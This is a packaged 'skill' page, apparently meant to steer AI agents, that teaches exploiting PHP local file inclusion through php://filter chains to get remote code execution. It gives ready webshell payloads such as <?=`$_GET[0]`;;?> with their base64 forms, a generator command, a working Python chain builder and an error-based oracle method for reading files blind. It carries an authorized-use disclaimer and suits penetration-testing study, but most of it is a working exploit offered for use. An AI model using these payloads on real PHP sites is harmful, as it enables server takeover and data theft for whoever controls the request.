Hacktricks-skills lfi2rce-php-filters

Exploit Local File Inclusion (LFI) vulnerabilities in PHP applications using filter chains to achieve Remote Code Execution (RCE). Use this skill whenever the user mentions LFI, file inclusion, PHP filters, php://filter, or wants to exploit PHP vulnerabilities to read files or execute code. Also trigger for requests about php://temp, iconv filters, base64 encoding tricks, or PHP filter chain generation.

Install

Source: clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-php-filters/SKILL.MD

Source content

LFI2RCE via PHP Filters

Overview

This skill helps you exploit Local File Inclusion (LFI) vulnerabilities in PHP applications by using PHP filter chains to generate arbitrary code without writing to disk. The technique chains convert.iconv.* and convert.base64-* filters to construct a payload that executes when included.

Core Concept

PHP filters can generate arbitrary content as output. By chaining filters, you can:

  1. Prepend \x1b$)C to the stream: convert.iconv.UTF8.CSISO2022KR always emits that escape sequence at the start of its output
  2. Apply further iconv conversions chosen so that those prepended bytes turn into one specific base64 digit while the base64 text already in the stream survives
  3. Run convert.base64-decode followed by convert.base64-encode to strip every byte that is not valid base64
  4. Repeat once per digit, working from the last digit of the base64-encoded payload to the first, since every round prepends
  5. Finish with convert.base64-decode so the rebuilt base64 string becomes executable PHP code

Key Filters

  • convert.iconv.UTF8.CSISO2022KR - always prepends \x1b$)C to its output
  • convert.base64-decode - tolerant: in its default non-strict mode it skips characters outside the base64 alphabet and accepts missing padding
  • convert.iconv.UTF8.UTF7 - gets rid of the = characters (base64 padding) that would break the next decode round

Resource Selection

Use php://temp as the resource because:

  • It is an empty in-memory stream, so the chain starts from nothing and no file write is required
  • It tolerates anything appended to it, so it still works when the vulnerable include automatically adds an extension such as .php
  • It is a local wrapper, so it does not depend on allow_url_include

Safety Warning

AUTHORIZED USE ONLY: This skill is for security testing on systems you own or have explicit permission to test. Unauthorized exploitation is illegal and unethical.

Quick Start

Basic Exploit Structure

// Target vulnerable include
php://filter/[FILTER_CHAIN]/resource=php://temp

Common Payloads

Goal: base64 payload (trailing = padding dropped, since the base64-decode filter tolerates it and a literal = would break the chain), with the PHP source in parentheses:

  • Execute command: PD89YCRfR0VUWzBdYDs7Pz4 (<?=`$_GET[0]`;;?>)
  • Read file: PD89ZmlsZV9nZXRfY29udGVudHMoJF9HRVRbJ2YnXSk7Pz4 (<?=file_get_contents($_GET['f']);?>)
  • Display info: PD89cGhwaW5mbygpOz8+ (<?=phpinfo();?>)

Using the Filter Chain Generator

Method 1: Use the bundled script

python scripts/generate_filter_chain.py --payload '<?=`$_GET[0]`;;?>' --target "http://example.com/vuln.php"

Use single quotes around the payload: inside double quotes the shell would expand $_GET and execute the backticks as a command substitution, mangling the payload before the script sees it.

Method 2: Manual construction

  1. Base64-encode your PHP payload and drop the trailing = padding
  2. Seed the chain so that the empty php://temp stream already holds a base64 string to prepend to:
    convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7
  3. For each character of the base64 string, starting from the last (every round prepends one character, so the first character of the payload is added last):
    • Append the conversion chain that turns the prepended \x1b$)C into that character
    • Append convert.base64-decode|convert.base64-encode to strip anything that is not valid base64
    • Append convert.iconv.UTF8.UTF7 to remove the = signs introduced by padding
  4. Finish with a final convert.base64-decode to turn the rebuilt base64 string into PHP code

Character Conversion Mappings

The script includes mappings for all 64 base64 characters. Key examples:

conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    # ... (full mappings in script)
}
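As an added worked example for the manual construction steps and the mapping table above (written for this page; it is not the bundled generate_filter_chain.py and not HackTricks code), the following Python generator builds a chain from a digit table. It assumes the four conversions listed above are the skill's own values and treats them as a partial table, raising on any digit it does not know rather than emitting a chain that cannot work. The seed and per-digit cleanup follow the order of the manual steps. The demo digits 'RBC8' are chosen only because they are all mapped; they do not decode to meaningful PHP.

```python
import base64
from urllib.parse import quote

# Partial conversion table: the four entries the page lists (assumed to
# match the bundled generate_filter_chain.py, which carries all 64 base64
# digits). A digit missing here raises KeyError instead of silently
# producing a chain that cannot work.
CONVERSIONS = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|'
         'convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|'
         'convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|'
         'convert.iconv.L6.UCS2',
}

# Run after every prepended digit: strip anything that is not valid
# base64, then remove the '=' padding that would break the next decode.
CLEANUP = 'convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7'


def b64_no_padding(php_source: bytes) -> str:
    """Base64 of the PHP source with trailing '=' dropped: the
    convert.base64-decode filter tolerates missing padding, and a literal
    '=' inside the chain would be mangled by the UTF-7 cleanup."""
    return base64.b64encode(php_source).decode('ascii').rstrip('=')


def build_filter_chain(b64_digits: str, table=CONVERSIONS) -> list:
    """Ordered filter list that makes an empty php://temp stream emit the
    bytes b64_digits decodes to. Each per-digit sequence prepends one
    digit, so the digits are processed last-to-first."""
    filters = [
        # Seed: prepend \x1b$)C to the empty stream and base64 it, so the
        # per-digit rounds have a base64 string to prepend to.
        'convert.iconv.UTF8.CSISO2022KR',
        'convert.base64-encode',
        'convert.iconv.UTF8.UTF7',
    ]
    for digit in reversed(b64_digits):
        filters.append(table[digit])      # KeyError for an unmapped digit
        filters.append(CLEANUP)
    filters.append('convert.base64-decode')
    return filters


def build_url(b64_digits: str, resource: str = 'php://temp',
              table=CONVERSIONS) -> str:
    """Complete php://filter URL to place in the vulnerable include."""
    chain = '|'.join(build_filter_chain(b64_digits, table))
    return f'php://filter/{chain}/resource={resource}'


def query_string(param: str, url: str) -> str:
    """Percent-encode the chain for a GET parameter (reserved characters
    such as '|' are encoded). Each digit adds on the order of a hundred
    bytes of chain, which is what eventually runs into URL length limits."""
    return f'{param}={quote(url, safe="")}'


if __name__ == '__main__':
    demo = build_url('RBC8')      # hypothetical digits, all in the table
    print(demo)
    print(len(query_string('page', demo)), 'bytes as a GET parameter')
    # Real payload digits, matching the page's payload list:
    print(b64_no_padding(b'<?=`$_GET[0]`;;?>'))
```

Feed query_string('page', build_url(b64_no_padding(payload))) into the vulnerable parameter once the full 64-entry table from the bundled script is loaded into CONVERSIONS.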

Advanced Techniques

Error-Based Oracles

When output is suppressed, use memory bombs to create 1-bit oracles:

  1. Chain memory-intensive filters (e.g. convert.iconv.UTF8.UCS-4LE ×12) to inflate the stream towards the PHP memory_limit
  2. Add the dechunk filter
  3. The first leaked base64 digit decides the outcome, because dechunk parses the stream as HTTP chunked encoding:
    • Hexadecimal (0-9, a-f, A-F) → dechunk reads it as a chunk-size line, never finds a valid chunk, and emits nothing; the request completes silently
    • Non-hex → dechunk enters its error state and passes the data through unchanged, so the inflated stream exhausts memory and PHP throws a fatal error
  4. Query repeatedly, using iconv conversions to rotate a different base64 digit to the front of the stream each time
  5. Read the file byte by byte even with no output
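To make the hex/non-hex split concrete, here is an added Python model of the dechunk filter's state machine, written for this page (it is not PHP's code, not the skill's code, and not HackTricks code). It reimplements the states of php_dechunk() in ext/standard/filters.c for a single bucket that begins at a chunk boundary; multi-bucket streams and the memory-bomb placement are not modelled, and the alphabet check is an assumption that the first byte of the stream is a base64 digit, as the oracle arranges.

```python
# Python model of PHP's dechunk stream filter (ext/standard/filters.c,
# php_dechunk), restricted to one bucket that starts at a chunk boundary.
# This is a reimplementation for illustration, not PHP's own code.
HEX = frozenset('0123456789abcdefABCDEF')
BASE64_ALPHABET = ('ABCDEFGHIJKLMNOPQRSTUVWXYZ'
                   'abcdefghijklmnopqrstuvwxyz0123456789+/')


def dechunk(data: bytes) -> bytes:
    out = bytearray()
    p, end = 0, len(data)
    state, size = 'SIZE_START', 0
    while p < end:
        if state in ('SIZE_START', 'SIZE'):
            if state == 'SIZE_START':
                size = 0
            while p < end:
                c = chr(data[p])
                if c in HEX:
                    size = size * 16 + int(c, 16)
                    state = 'SIZE'
                    p += 1
                elif state == 'SIZE_START':
                    # Non-hex first byte: the filter gives up and copies
                    # the rest of the stream through untouched.
                    state = 'ERROR'
                    break
                else:
                    state = 'SIZE_EXT'
                    break
            if state == 'ERROR':
                continue
            if p == end:
                break              # size line unfinished: nothing emitted
            state = 'SIZE_EXT'
        if state == 'SIZE_EXT':
            while p < end and data[p] not in b'\r\n':
                p += 1             # skip the chunk extension
            if p == end:
                break              # no line end: still nothing emitted
            state = 'SIZE_CRLF'
        if state == 'SIZE_CRLF':
            while p < end and data[p] in b'\r\n':
                p += 1
            if p == end:
                break
            if size == 0:
                state = 'TRAILER'
                continue
            state = 'BODY'
        if state == 'BODY':
            take = min(size, end - p)
            out += data[p:p + take]
            p += take
            size -= take
            if size == 0:
                state = 'BODY_CRLF'
            continue
        if state == 'BODY_CRLF':
            while p < end and data[p] in b'\r\n':
                p += 1
            state = 'SIZE_START'
            continue
        if state == 'TRAILER':
            p = end                # trailers are ignored
            continue
        if state == 'ERROR':
            out += data[p:end]
            p = end
    return bytes(out)


def survives_dechunk(stream: bytes) -> bool:
    """The oracle bit: True when dechunk passes data on (so a memory bomb
    later in the chain fires), False when it swallows the stream."""
    return len(dechunk(stream)) > 0


def wiping_digits() -> str:
    """Base64 digits that, as the first byte of the stream, make dechunk
    emit nothing. Every other digit lands in the pass-through branch."""
    return ''.join(d for d in BASE64_ALPHABET
                   if not survives_dechunk((d + 'Zz').encode()))
```

Only 22 of the 64 base64 digits are hexadecimal, which is why the oracle needs the iconv rotations of step 4 to move each digit of interest to the front and map it onto that split before a single byte can be recovered.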

Lightyear Digit-Set Jumps

For large file dumps via GET parameters, where a plain oracle chain would run into URL length limits:

  1. Build alternative base64 digit sets via iconv sequences
  2. Turn the chosen digits into newlines
  3. Prepend a hex character and run dechunk to jump over whole chunks
  4. Use a dichotomy tree of at most six queries, each halving the 64-digit candidate set, to pin down one digit
  5. Dump files without triggering PHP warnings

Testing Checklist

Before exploiting:

  • Confirm the LFI exists (an include/require that takes a user-controlled path)
  • Confirm the iconv extension is loaded: filter chains depend on iconv, not on a PHP major version, and work on 7.x and 8.x; individual conversions differ between iconv implementations (glibc, libiconv, musl), so a chain generated for one build may fail on another
  • Check that the php://temp wrapper is usable; it is a local wrapper, so allow_url_include is not required
  • Test with a simple filter first:
    php://filter/convert.base64-encode/resource=php://temp
    must not error, but it produces no output because php://temp is empty; base64-encoding a known file instead confirms that filter output actually reaches you
  • Verify no WAF blocks the filter syntax (the php:// scheme and the | separators)
  • Confirm you have authorization

Common Issues

Problem → Solution

  • = characters break the payload → add convert.iconv.UTF8.UTF7 after each base64 encode
  • Include appends .php → use php://temp as the resource
  • Output suppressed → use the error-based oracle technique
  • Filter chain too long → use Lightyear chunk pruning
  • WAF blocks filters → try URL encoding or alternative syntax

References

Next Steps

  1. Run the filter chain generator script to create your payload
  2. Test against the vulnerable endpoint
  3. If output is suppressed, try error-based oracle technique
  4. For large files, use Lightyear digit-set jumps
  5. Document findings for your security report